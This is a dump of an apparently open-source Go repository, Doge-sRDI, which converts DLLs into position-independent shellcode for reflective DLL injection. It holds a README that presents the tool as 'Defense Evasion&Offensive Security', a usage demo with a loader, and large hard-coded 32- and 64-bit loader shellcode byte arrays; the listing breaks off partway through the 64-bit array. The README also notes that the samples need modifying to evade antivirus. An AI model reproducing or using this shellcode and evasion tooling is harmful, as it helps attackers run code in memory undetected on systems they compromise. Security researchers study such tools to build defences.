├── Outflank-PsC.dll
├── README.md
├── const.go
└── srdi.go


/Outflank-PsC.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/timwhitez/Doge-sRDI/1f84e65849f9eb80dc44a88a04f5ea720948400b/Outflank-PsC.dll


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ![Doge-sRDI](https://socialify.git.ci/timwhitez/Doge-sRDI/image?description=1&font=Raleway&forks=1&issues=1&language=1&logo=https%3A%2F%2Favatars1.githubusercontent.com%2Fu%2F36320909&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)
 2 | 
 3 | - 🐸Frog For Automatic Scan
 4 | 
 5 | - 🐶Doge For Defense Evasion&Offensive Security
 6 | 
 7 | # Doge-sRDI
 8 | Shellcode implementation of Reflective DLL Injection by Golang. Convert DLLs to position independent shellcode
 9 | 
10 | ## Big thanks to Sliver project and leoloobeek
11 | [Sliver](https://github.com/BishopFox/sliver)
12 | 
13 | [ShellcodeRDI.go](https://gist.github.com/leoloobeek/c726719d25d7e7953d4121bd93dd2ed3)
14 | 
15 | [sRDI raw project](https://github.com/monoxgas/sRDI)
16 | 
17 | ## Usage
18 | srdi.exe [dllName] [Args(not necessary)] [entryPoint(not necessary)]
19 | ```
20 | PS D:\> .\srdi.exe .\Outflank-PsC.dll
21 | Outflank-PsC.bin
22 | PS D:\> .\loader.exe .\Outflank-PsC.bin 1
23 | Mess with the banana, die like the... banana?
24 | 
25 | --------------------------------------------------------------------
26 | 
27 | [+] ProcessName:   svchost.exe
28 |     ProcessID:     3968
29 |     PPID:          940 (services.exe)
30 |     CreateTime:    17/03/2021 21:01
31 |     Path:          C:\Windows\System32\svchost.exe
32 |     ImageType:     64-bit
33 |     CompanyName:   Microsoft Corporation
34 |     Description:   Windows ?????
35 |     Version:       10.0.19041.867
36 | 
37 | ......
38 | ```
39 | 
40 | ## 🚀Star Trend
41 | [![Stargazers over time](https://starchart.cc/timwhitez/Doge-sRDI.svg)](https://starchart.cc/timwhitez/Doge-sRDI)
42 | 
43 | 
44 | ## etc
45 | 1. 开源的样本大部分可能已经无法免杀,需要自行修改
46 | 
47 | 2. 我认为基础核心代码的开源与整理能够帮助想学习的人
48 |  
49 | 3. 本人从github大佬项目中学到了很多，感谢
50 |  
51 | 4. 若用本人项目去进行：HW演练/红蓝对抗/APT/黑产/恶意行为/违法行为/割韭菜，等行为，本人概不负责，也与本人无关
52 | 
53 | 5. 本人已不参与大小HW活动的攻击方了，若溯源到timwhite id与本人无关
54 | 


--------------------------------------------------------------------------------
/const.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | /*
 4 | 	This is port of SRDI by Leo Loobeek, that we've made a few modifications to
 5 | 
 6 | 	Originals:
 7 | 	https://gist.github.com/leoloobeek/c726719d25d7e7953d4121bd93dd2ed3
 8 | 	https://silentbreaksecurity.com/srdi-shellcode-reflective-dll-injection/
 9 | */
10 | 
11 | // Moved shellcode to it's own file to de-clutter the source code
12 | 
13 | var (
14 | 	rdiShellcode32 = []byte{0x83, 0xEC, 0x6C, 0x53, 0x55, 0x56, 0x57, 0xB9, 0x4C, 0x77, 0x26, 0x07, 0xE8, 0x6E, 0x06, 0x00, 0x00, 0x8B, 0xF8, 0xB9, 0x49, 0xF7, 0x02, 0x78, 0x89, 0x7C, 0x24, 0x28, 0xE8, 0x5E, 0x06, 0x00, 0x00, 0x8B, 0xF0, 0xB9, 0x58, 0xA4, 0x53, 0xE5, 0x89, 0x74, 0x24, 0x2C, 0xE8, 0x4E, 0x06, 0x00, 0x00, 0x8B, 0xD8, 0xB9, 0x10, 0xE1, 0x8A, 0xC3, 0x89, 0x5C, 0x24, 0x20, 0xE8, 0x3E, 0x06, 0x00, 0x00, 0xB9, 0xAF, 0xB1, 0x5C, 0x94, 0x89, 0x44, 0x24, 0x30, 0xE8, 0x30, 0x06, 0x00, 0x00, 0xB9, 0x33, 0x00, 0x9E, 0x95, 0x89, 0x44, 0x24, 0x34, 0xE8, 0x22, 0x06, 0x00, 0x00, 0xB9, 0x44, 0xF0, 0x35, 0xE0, 0x8B, 0xE8, 0xE8, 0x16, 0x06, 0x00, 0x00, 0x89, 0x44, 0x24, 0x40, 0x85, 0xFF, 0x0F, 0x84, 0x00, 0x06, 0x00, 0x00, 0x85, 0xF6, 0x0F, 0x84, 0xF8, 0x05, 0x00, 0x00, 0x85, 0xDB, 0x0F, 0x84, 0xF0, 0x05, 0x00, 0x00, 0x83, 0x7C, 0x24, 0x30, 0x00, 0x0F, 0x84, 0xE5, 0x05, 0x00, 0x00, 0x83, 0x7C, 0x24, 0x34, 0x00, 0x0F, 0x84, 0xDA, 0x05, 0x00, 0x00, 0x85, 0xED, 0x0F, 0x84, 0xD2, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x0F, 0x84, 0xCA, 0x05, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0x70, 0x3C, 0x03, 0xF0, 0x81, 0x3E, 0x50, 0x45, 0x00, 0x00, 0x0F, 0x85, 0xB2, 0x05, 0x00, 0x00, 0xB8, 0x4C, 0x01, 0x00, 0x00, 0x66, 0x39, 0x46, 0x04, 0x0F, 0x85, 0xA3, 0x05, 0x00, 0x00, 0xF6, 0x46, 0x38, 0x01, 0x0F, 0x85, 0x99, 0x05, 0x00, 0x00, 0x0F, 0xB7, 0x56, 0x06, 0x33, 0xFF, 0x0F, 0xB7, 0x46, 0x14, 0x85, 0xD2, 0x74, 0x22, 0x8D, 0x4E, 0x24, 0x03, 0xC8, 0x83, 0x79, 0x04, 0x00, 0x8B, 0x01, 0x75, 0x05, 0x03, 0x46, 0x38, 0xEB, 0x03, 0x03, 0x41, 0x04, 0x3B, 0xC7, 0x0F, 0x47, 0xF8, 0x83, 0xC1, 0x28, 0x83, 0xEA, 0x01, 0x75, 0xE3, 0x8D, 0x44, 0x24, 0x58, 0x50, 0xFF, 0xD5, 0x8B, 0x4C, 0x24, 0x5C, 0x8D, 0x51, 0xFF, 0x8D, 0x69, 0xFF, 0xF7, 0xD2, 0x03, 0x6E, 0x50, 0x8D, 0x41, 0xFF, 0x03, 0xC7, 0x23, 0xEA, 0x23, 0xC2, 0x3B, 0xE8, 0x0F, 0x85, 0x42, 0x05, 0x00, 0x00, 0x6A, 0x04, 0xBF, 0x00, 0x30, 0x00, 0x00, 0x57, 0x55, 0xFF, 0x76, 0x34, 0xFF, 0xD3, 0x8B, 0xD8, 0x89, 0x5C, 0x24, 0x24, 0x85, 0xDB, 0x75, 0x0F, 0x6A, 0x04, 0x57, 0x55, 0x50, 0xFF, 0x54, 0x24, 0x30, 0x8B, 0xD8, 0x89, 0x44, 0x24, 0x24, 0xF6, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x74, 0x28, 0x8B, 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0x42, 0x3C, 0x89, 0x43, 0x3C, 0x8B, 0x4A, 0x3C, 0x3B, 0x4E, 0x54, 0x73, 0x31, 0x8D, 0x3C, 0x0B, 0x2B, 0xD3, 0x8A, 0x04, 0x3A, 0x41, 0x88, 0x07, 0x47, 0x3B, 0x4E, 0x54, 0x72, 0xF4, 0xEB, 0x1E, 0x33, 0xFF, 0x39, 0x7E, 0x54, 0x76, 0x17, 0x8B, 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0xCB, 0x2B, 0xD3, 0x8A, 0x04, 0x11, 0x47, 0x88, 0x01, 0x41, 0x3B, 0x7E, 0x54, 0x72, 0xF4, 0x8B, 0x6B, 0x3C, 0x33, 0xC9, 0x03, 0xEB, 0x89, 0x4C, 0x24, 0x1C, 0x33, 0xD2, 0x89, 0x6C, 0x24, 0x14, 0x0F, 0xB7, 0x45, 0x14, 0x66, 0x3B, 0x55, 0x06, 0x73, 0x40, 0x8D, 0x75, 0x28, 0x03, 0xF0, 0x33, 0xFF, 0x39, 0x3E, 0x76, 0x25, 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x8B, 0x46, 0x04, 0x8D, 0x14, 0x3B, 0x8B, 0x4E, 0xFC, 0x03, 0xC7, 0x47, 0x8A, 0x04, 0x28, 0x88, 0x04, 0x0A, 0x3B, 0x3E, 0x72, 0xEA, 0x8B, 0x6C, 0x24, 0x14, 0x8B, 0x4C, 0x24, 0x1C, 0x0F, 0xB7, 0x45, 0x06, 0x41, 0x83, 0xC6, 0x28, 0x89, 0x4C, 0x24, 0x1C, 0x3B, 0xC8, 0x72, 0xC5, 0x6A, 0x01, 0x8B, 0xFB, 0x5E, 0x89, 0x74, 0x24, 0x20, 0x2B, 0x7D, 0x34, 0x74, 0x7B, 0x83, 0xBD, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x72, 0x8B, 0x95, 0xA0, 0x00, 0x00, 0x00, 0x03, 0xD3, 0x83, 0x3A, 0x00, 0x74, 0x65, 0x6A, 0x02, 0x5D, 0x8D, 0x72, 0x08, 0xEB, 0x46, 0x0F, 0xB7, 0x0E, 0x66, 0x8B, 0xC1, 0x66, 0xC1, 0xE8, 0x0C, 0x66, 0x83, 0xF8, 0x0A, 0x74, 0x06, 0x66, 0x83, 0xF8, 0x03, 0x75, 0x0D, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x0A, 0x01, 0x3C, 0x19, 0xEB, 0x21, 0x66, 0x3B, 0x44, 0x24, 0x20, 0x75, 0x07, 0x8B, 0xC7, 0xC1, 0xE8, 0x10, 0xEB, 0x08, 0x66, 0x3B, 0xC5, 0x75, 0x0E, 0x0F, 0xB7, 0xC7, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x0A, 0x01, 0x04, 0x19, 0x03, 0xF5, 0x8B, 0x42, 0x04, 0x03, 0xC2, 0x3B, 0xF0, 0x75, 0xB1, 0x83, 0x3E, 0x00, 0x8B, 0xD6, 0x75, 0xA5, 0x8B, 0x6C, 0x24, 0x14, 0x33, 0xF6, 0x46, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x84, 0x97, 0x01, 0x00, 0x00, 0x8B, 0x85, 0x80, 0x00, 0x00, 0x00, 0x8D, 0x0C, 0x18, 0x83, 0xC0, 0x0C, 0x03, 0xC3, 0x89, 0x4C, 0x24, 0x1C, 0x33, 0xC9, 0x89, 0x4C, 0x24, 0x18, 0x39, 0x08, 0x74, 0x0D, 0x8D, 0x40, 0x14, 0x41, 0x83, 0x38, 0x00, 0x75, 0xF7, 0x89, 0x4C, 0x24, 0x18, 0x8B, 0x94, 0x24, 0x90, 0x00, 0x00, 0x00, 0x8B, 0xC2, 0x83, 0xE0, 0x04, 0x89, 0x44, 0x24, 0x3C, 0x0F, 0x84, 0xAE, 0x00, 0x00, 0x00, 0x3B, 0xCE, 0x0F, 0x86, 0xA6, 0x00, 0x00, 0x00, 0xC1, 0xEA, 0x10, 0x8D, 0x41, 0xFF, 0x89, 0x94, 0x24, 0x90, 0x00, 0x00, 0x00, 0x33, 0xD2, 0x89, 0x44, 0x24, 0x38, 0x89, 0x54, 0x24, 0x20, 0x85, 0xC0, 0x0F, 0x84, 0x92, 0x00, 0x00, 0x00, 0x8B, 0x5C, 0x24, 0x1C, 0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x89, 0x5C, 0x24, 0x1C, 0x2B, 0xCA, 0x69, 0xED, 0xFD, 0x43, 0x03, 0x00, 0x33, 0xD2, 0x8D, 0x7C, 0x24, 0x44, 0xB8, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x81, 0xC5, 0xC3, 0x9E, 0x26, 0x00, 0x33, 0xD2, 0x6A, 0x05, 0x8D, 0x48, 0x01, 0x8B, 0xC5, 0xC1, 0xE8, 0x10, 0x25, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x8B, 0x54, 0x24, 0x24, 0x03, 0xC2, 0x6B, 0xC0, 0x14, 0x59, 0x6A, 0x05, 0x03, 0xC3, 0x42, 0x8B, 0xF0, 0x89, 0x54, 0x24, 0x24, 0xF3, 0xA5, 0x8B, 0x74, 0x24, 0x20, 0x8B, 0xF8, 0x8B, 0x44, 0x24, 0x20, 0x59, 0xF3, 0xA5, 0x6A, 0x05, 0x8B, 0xF8, 0x8D, 0x74, 0x24, 0x48, 0x59, 0x83, 0xC0, 0x14, 0xF3, 0xA5, 0x8B, 0x4C, 0x24, 0x18, 0x89, 0x44, 0x24, 0x1C, 0x3B, 0x54, 0x24, 0x38, 0x72, 0x92, 0x8B, 0x5C, 0x24, 0x24, 0x8B, 0x6C, 0x24, 0x14, 0xEB, 0x0B, 0x8B, 0x44, 0x24, 0x40, 0x89, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x8B, 0xB5, 0x80, 0x00, 0x00, 0x00, 0x03, 0xF3, 0x89, 0x74, 0x24, 0x20, 0x8B, 0x46, 0x0C, 0x85, 0xC0, 0x0F, 0x84, 0x88, 0x00, 0x00, 0x00, 0x8B, 0x6C, 0x24, 0x18, 0x03, 0xC3, 0x50, 0xFF, 0x54, 0x24, 0x2C, 0x8B, 0x7E, 0x10, 0x89, 0x44, 0x24, 0x38, 0x03, 0xFB, 0x8B, 0x06, 0x03, 0xC3, 0x89, 0x44, 0x24, 0x24, 0x8B, 0x08, 0x85, 0xC9, 0x74, 0x36, 0x8B, 0x6C, 0x24, 0x38, 0x8B, 0x74, 0x24, 0x2C, 0x79, 0x05, 0x0F, 0xB7, 0xC1, 0xEB, 0x05, 0x8D, 0x41, 0x02, 0x03, 0xC3, 0x50, 0x55, 0xFF, 0xD6, 0x89, 0x07, 0x83, 0xC7, 0x04, 0x8B, 0x44, 0x24, 0x24, 0x83, 0xC0, 0x04, 0x89, 0x44, 0x24, 0x24, 0x8B, 0x08, 0x85, 0xC9, 0x75, 0xDA, 0x8B, 0x74, 0x24, 0x20, 0x8B, 0x6C, 0x24, 0x18, 0x83, 0x7C, 0x24, 0x3C, 0x00, 0x74, 0x17, 0x33, 0xC0, 0x40, 0x3B, 0xE8, 0x76, 0x10, 0x69, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0xE8, 0x03, 0x00, 0x00, 0x50, 0xFF, 0x54, 0x24, 0x44, 0x8B, 0x46, 0x20, 0x83, 0xC6, 0x14, 0x89, 0x74, 0x24, 0x20, 0x85, 0xC0, 0x75, 0x80, 0x8B, 0x6C, 0x24, 0x14, 0x83, 0xBD, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x73, 0x8B, 0xBD, 0xE0, 0x00, 0x00, 0x00, 0x83, 0xC7, 0x04, 0x03, 0xFB, 0x89, 0x7C, 0x24, 0x20, 0x83, 0x3F, 0x00, 0x74, 0x5F, 0x8B, 0x07, 0x03, 0xC3, 0x50, 0xFF, 0x54, 0x24, 0x2C, 0x8B, 0x77, 0x08, 0x8B, 0xE8, 0x8B, 0x47, 0x0C, 0x03, 0xF3, 0x03, 0xC3, 0x89, 0x44, 0x24, 0x24, 0x83, 0x3E, 0x00, 0x74, 0x31, 0x8B, 0x7C, 0x24, 0x2C, 0x8B, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xB7, 0xC0, 0xEB, 0x05, 0x83, 0xC0, 0x02, 0x03, 0xC3, 0x50, 0x55, 0xFF, 0xD7, 0x89, 0x06, 0x83, 0xC6, 0x04, 0x8B, 0x44, 0x24, 0x24, 0x83, 0xC0, 0x04, 0x89, 0x44, 0x24, 0x24, 0x83, 0x3E, 0x00, 0x75, 0xD7, 0x8B, 0x7C, 0x24, 0x20, 0x83, 0xC7, 0x20, 0x89, 0x7C, 0x24, 0x20, 0x83, 0x3F, 0x00, 0x75, 0xA5, 0x8B, 0x6C, 0x24, 0x14, 0x0F, 0xB7, 0x45, 0x14, 0x33, 0xC9, 0x33, 0xFF, 0x66, 0x3B, 0x4D, 0x06, 0x0F, 0x83, 0xB0, 0x00, 0x00, 0x00, 0x8D, 0x75, 0x3C, 0x03, 0xF0, 0x83, 0x7E, 0xEC, 0x00, 0x0F, 0x84, 0x91, 0x00, 0x00, 0x00, 0x8B, 0x0E, 0x33, 0xD2, 0x42, 0x8B, 0xC1, 0xC1, 0xE8, 0x1D, 0x23, 0xC2, 0x8B, 0xD1, 0xC1, 0xEA, 0x1E, 0x83, 0xE2, 0x01, 0xC1, 0xE9, 0x1F, 0x85, 0xC0, 0x75, 0x18, 0x85, 0xD2, 0x75, 0x0D, 0x6A, 0x08, 0x58, 0x6A, 0x01, 0x85, 0xC9, 0x59, 0x0F, 0x44, 0xC1, 0xEB, 0x3D, 0x6A, 0x04, 0x58, 0x6A, 0x02, 0xEB, 0xF1, 0x85, 0xD2, 0x75, 0x1E, 0x85, 0xC9, 0x75, 0x05, 0x6A, 0x10, 0x58, 0xEB, 0x29, 0x85, 0xD2, 0x75, 0x11, 0x85, 0xC9, 0x74, 0x07, 0xB8, 0x80, 0x00, 0x00, 0x00, 0xEB, 0x1A, 0x8B, 0x44, 0x24, 0x10, 0xEB, 0x18, 0x85, 0xC9, 0x75, 0x04, 0x6A, 0x20, 0xEB, 0xE0, 0x8B, 0x44, 0x24, 0x10, 0x85, 0xC9, 0x6A, 0x40, 0x5A, 0x0F, 0x45, 0xC2, 0x89, 0x44, 0x24, 0x10, 0xF7, 0x06, 0x00, 0x00, 0x00, 0x04, 0x74, 0x09, 0x0D, 0x00, 0x02, 0x00, 0x00, 0x89, 0x44, 0x24, 0x10, 0x8D, 0x4C, 0x24, 0x10, 0x51, 0x50, 0x8B, 0x46, 0xE8, 0xFF, 0x76, 0xEC, 0x03, 0xC3, 0x50, 0xFF, 0x54, 0x24, 0x40, 0x0F, 0xB7, 0x45, 0x06, 0x47, 0x83, 0xC6, 0x28, 0x3B, 0xF8, 0x0F, 0x82, 0x55, 0xFF, 0xFF, 0xFF, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0xFF, 0xFF, 0x54, 0x24, 0x40, 0x83, 0xBD, 0xC4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x26, 0x8B, 0x85, 0xC0, 0x00, 0x00, 0x00, 0x8B, 0x74, 0x18, 0x0C, 0x8B, 0x06, 0x85, 0xC0, 0x74, 0x16, 0x33, 0xED, 0x45, 0x6A, 0x00, 0x55, 0x53, 0xFF, 0xD0, 0x8D, 0x76, 0x04, 0x8B, 0x06, 0x85, 0xC0, 0x75, 0xF1, 0x8B, 0x6C, 0x24, 0x14, 0x33, 0xC0, 0x40, 0x50, 0x50, 0x8B, 0x45, 0x28, 0x53, 0x03, 0xC3, 0xFF, 0xD0, 0x83, 0xBC, 0x24, 0x84, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xAD, 0x00, 0x00, 0x00, 0x83, 0x7D, 0x7C, 0x00, 0x0F, 0x84, 0xA3, 0x00, 0x00, 0x00, 0x8B, 0x55, 0x78, 0x03, 0xD3, 0x8B, 0x6A, 0x18, 0x85, 0xED, 0x0F, 0x84, 0x93, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x14, 0x00, 0x0F, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8B, 0x7A, 0x20, 0x8B, 0x4A, 0x24, 0x03, 0xFB, 0x83, 0x64, 0x24, 0x34, 0x00, 0x03, 0xCB, 0x85, 0xED, 0x74, 0x76, 0x8B, 0x37, 0xC7, 0x44, 0x24, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x03, 0xF3, 0x74, 0x68, 0x8A, 0x06, 0x84, 0xC0, 0x74, 0x1C, 0x8B, 0x6C, 0x24, 0x1C, 0x0F, 0xBE, 0xC0, 0x03, 0xC5, 0xC1, 0xC8, 0x0D, 0x46, 0x8B, 0xE8, 0x8A, 0x06, 0x84, 0xC0, 0x75, 0xEF, 0x89, 0x6C, 0x24, 0x1C, 0x8B, 0x6A, 0x18, 0x8B, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x3B, 0x44, 0x24, 0x1C, 0x75, 0x04, 0x85, 0xC9, 0x75, 0x15, 0x8B, 0x44, 0x24, 0x34, 0x83, 0xC7, 0x04, 0x40, 0x83, 0xC1, 0x02, 0x89, 0x44, 0x24, 0x34, 0x3B, 0xC5, 0x72, 0xAC, 0xEB, 0x20, 0x0F, 0xB7, 0x09, 0x8B, 0x42, 0x1C, 0xFF, 0xB4, 0x24, 0x8C, 0x00, 0x00, 0x00, 0xFF, 0xB4, 0x24, 0x8C, 0x00, 0x00, 0x00, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x18, 0x03, 0xC3, 0xFF, 0xD0, 0x59, 0x59, 0x8B, 0xC3, 0xEB, 0x02, 0x33, 0xC0, 0x5F, 0x5E, 0x5D, 0x5B, 0x83, 0xC4, 0x6C, 0xC3, 0x83, 0xEC, 0x10, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8B, 0x40, 0x0C, 0x57, 0x89, 0x4C, 0x24, 0x18, 0x8B, 0x70, 0x0C, 0xE9, 0x8A, 0x00, 0x00, 0x00, 0x8B, 0x46, 0x30, 0x33, 0xC9, 0x8B, 0x5E, 0x2C, 0x8B, 0x36, 0x89, 0x44, 0x24, 0x14, 0x8B, 0x42, 0x3C, 0x8B, 0x6C, 0x10, 0x78, 0x89, 0x6C, 0x24, 0x10, 0x85, 0xED, 0x74, 0x6D, 0xC1, 0xEB, 0x10, 0x33, 0xFF, 0x85, 0xDB, 0x74, 0x1F, 0x8B, 0x6C, 0x24, 0x14, 0x8A, 0x04, 0x2F, 0xC1, 0xC9, 0x0D, 0x3C, 0x61, 0x0F, 0xBE, 0xC0, 0x7C, 0x03, 0x83, 0xC1, 0xE0, 0x03, 0xC8, 0x47, 0x3B, 0xFB, 0x72, 0xE9, 0x8B, 0x6C, 0x24, 0x10, 0x8B, 0x44, 0x2A, 0x20, 0x33, 0xDB, 0x8B, 0x7C, 0x2A, 0x18, 0x03, 0xC2, 0x89, 0x7C, 0x24, 0x14, 0x85, 0xFF, 0x74, 0x31, 0x8B, 0x28, 0x33, 0xFF, 0x03, 0xEA, 0x83, 0xC0, 0x04, 0x89, 0x44, 0x24, 0x1C, 0x0F, 0xBE, 0x45, 0x00, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0x45, 0x80, 0x7D, 0xFF, 0x00, 0x75, 0xF0, 0x8D, 0x04, 0x0F, 0x3B, 0x44, 0x24, 0x18, 0x74, 0x20, 0x8B, 0x44, 0x24, 0x1C, 0x43, 0x3B, 0x5C, 0x24, 0x14, 0x72, 0xCF, 0x8B, 0x56, 0x18, 0x85, 0xD2, 0x0F, 0x85, 0x6B, 0xFF, 0xFF, 0xFF, 0x33, 0xC0, 0x5F, 0x5E, 0x5D, 0x5B, 0x83, 0xC4, 0x10, 0xC3, 0x8B, 0x74, 0x24, 0x10, 0x8B, 0x44, 0x16, 0x24, 0x8D, 0x04, 0x58, 0x0F, 0xB7, 0x0C, 0x10, 0x8B, 0x44, 0x16, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x10, 0x03, 0xC2, 0xEB, 0xDB}
15 | 
16 | 	rdiShellcode64 = []byte{0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x44, 0x89, 0x48, 0x20, 0x4C, 0x89, 0x40, 0x18, 0x89, 0x50, 0x10, 0x55, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8D, 0x68, 0xA9, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xF1, 0xB9, 0x4C, 0x77, 0x26, 0x07, 0xE8, 0xA3, 0x06, 0x00, 0x00, 0xB9, 0x49, 0xF7, 0x02, 0x78, 0x48, 0x89, 0x45, 0xB7, 0x4C, 0x8B, 0xE0, 0xE8, 0x92, 0x06, 0x00, 0x00, 0xB9, 0x58, 0xA4, 0x53, 0xE5, 0x48, 0x89, 0x45, 0xBF, 0x4C, 0x8B, 0xE8, 0xE8, 0x81, 0x06, 0x00, 0x00, 0xB9, 0x10, 0xE1, 0x8A, 0xC3, 0x4C, 0x8B, 0xF8, 0xE8, 0x74, 0x06, 0x00, 0x00, 0xB9, 0xAF, 0xB1, 0x5C, 0x94, 0x48, 0x89, 0x45, 0xD7, 0x48, 0x8B, 0xF8, 0xE8, 0x63, 0x06, 0x00, 0x00, 0xB9, 0x33, 0x00, 0x9E, 0x95, 0x48, 0x89, 0x45, 0xDF, 0x48, 0x8B, 0xD8, 0xE8, 0x52, 0x06, 0x00, 0x00, 0xB9, 0x44, 0xF0, 0x35, 0xE0, 0x4C, 0x8B, 0xF0, 0xE8, 0x45, 0x06, 0x00, 0x00, 0x45, 0x33, 0xD2, 0x48, 0x89, 0x45, 0xC7, 0x4D, 0x85, 0xE4, 0x0F, 0x84, 0x16, 0x06, 0x00, 0x00, 0x4D, 0x85, 0xED, 0x0F, 0x84, 0x0D, 0x06, 0x00, 0x00, 0x4D, 0x85, 0xFF, 0x0F, 0x84, 0x04, 0x06, 0x00, 0x00, 0x48, 0x85, 0xFF, 0x0F, 0x84, 0xFB, 0x05, 0x00, 0x00, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xF2, 0x05, 0x00, 0x00, 0x4D, 0x85, 0xF6, 0x0F, 0x84, 0xE9, 0x05, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xE0, 0x05, 0x00, 0x00, 0x48, 0x63, 0x7E, 0x3C, 0x48, 0x03, 0xFE, 0x81, 0x3F, 0x50, 0x45, 0x00, 0x00, 0x0F, 0x85, 0xCD, 0x05, 0x00, 0x00, 0xB8, 0x64, 0x86, 0x00, 0x00, 0x66, 0x39, 0x47, 0x04, 0x0F, 0x85, 0xBE, 0x05, 0x00, 0x00, 0x44, 0x8B, 0x47, 0x38, 0x45, 0x8D, 0x5A, 0x01, 0x45, 0x84, 0xC3, 0x0F, 0x85, 0xAD, 0x05, 0x00, 0x00, 0x0F, 0xB7, 0x47, 0x06, 0x41, 0x8B, 0xDA, 0x0F, 0xB7, 0x4F, 0x14, 0x85, 0xC0, 0x74, 0x28, 0x48, 0x83, 0xC1, 0x24, 0x44, 0x8B, 0xC8, 0x48, 0x03, 0xCF, 0x8B, 0x51, 0x04, 0x85, 0xD2, 0x75, 0x07, 0x8B, 0x11, 0x41, 0x03, 0xD0, 0xEB, 0x02, 0x03, 0x11, 0x3B, 0xD3, 0x0F, 0x47, 0xDA, 0x48, 0x83, 0xC1, 0x28, 0x4D, 0x2B, 0xCB, 0x75, 0xE2, 0x48, 0x8D, 0x4D, 0xE7, 0x41, 0xFF, 0xD6, 0x8B, 0x55, 0xEB, 0x44, 0x8D, 0x72, 0xFF, 0x44, 0x03, 0x77, 0x50, 0x8D, 0x42, 0xFF, 0xF7, 0xD0, 0x48, 0x8D, 0x4A, 0xFF, 0x44, 0x23, 0xF0, 0x8B, 0xC3, 0x48, 0x03, 0xC8, 0x48, 0x8D, 0x42, 0xFF, 0x48, 0xF7, 0xD0, 0x48, 0x23, 0xC8, 0x4C, 0x3B, 0xF1, 0x0F, 0x85, 0x40, 0x05, 0x00, 0x00, 0x48, 0x8B, 0x4F, 0x30, 0x41, 0xB9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xB8, 0x00, 0x30, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x41, 0xFF, 0xD7, 0x48, 0x8B, 0xD8, 0x48, 0x85, 0xC0, 0x75, 0x15, 0x44, 0x8D, 0x48, 0x04, 0x41, 0xB8, 0x00, 0x30, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x33, 0xC9, 0x41, 0xFF, 0xD7, 0x48, 0x8B, 0xD8, 0x44, 0x8B, 0x5D, 0x7F, 0x41, 0xBE, 0x01, 0x00, 0x00, 0x00, 0x45, 0x84, 0xDE, 0x0F, 0x84, 0xB1, 0x00, 0x00, 0x00, 0x8B, 0x46, 0x3C, 0x89, 0x43, 0x3C, 0x8B, 0x56, 0x3C, 0xEB, 0x0B, 0x8B, 0xCA, 0x41, 0x03, 0xD6, 0x8A, 0x04, 0x31, 0x88, 0x04, 0x19, 0x3B, 0x57, 0x54, 0x72, 0xF0, 0x45, 0x33, 0xFF, 0x48, 0x63, 0x7B, 0x3C, 0x45, 0x8B, 0xD7, 0x48, 0x03, 0xFB, 0x48, 0x89, 0x7D, 0xCF, 0x0F, 0xB7, 0x47, 0x14, 0x66, 0x44, 0x3B, 0x7F, 0x06, 0x73, 0x3E, 0x4C, 0x8D, 0x47, 0x28, 0x4C, 0x03, 0xC0, 0x45, 0x8B, 0xCF, 0x45, 0x39, 0x38, 0x76, 0x1F, 0x41, 0x8B, 0x50, 0x04, 0x41, 0x8B, 0x48, 0xFC, 0x41, 0x8B, 0xC1, 0x45, 0x03, 0xCE, 0x48, 0x03, 0xC8, 0x48, 0x03, 0xD0, 0x8A, 0x04, 0x32, 0x88, 0x04, 0x19, 0x45, 0x3B, 0x08, 0x72, 0xE1, 0x0F, 0xB7, 0x47, 0x06, 0x45, 0x03, 0xD6, 0x49, 0x83, 0xC0, 0x28, 0x44, 0x3B, 0xD0, 0x72, 0xC9, 0x4C, 0x8B, 0xD3, 0x4C, 0x2B, 0x57, 0x30, 0x0F, 0x84, 0xDE, 0x00, 0x00, 0x00, 0x44, 0x39, 0xBF, 0xB4, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xD1, 0x00, 0x00, 0x00, 0x44, 0x8B, 0x87, 0xB0, 0x00, 0x00, 0x00, 0x4C, 0x03, 0xC3, 0x45, 0x39, 0x38, 0x0F, 0x84, 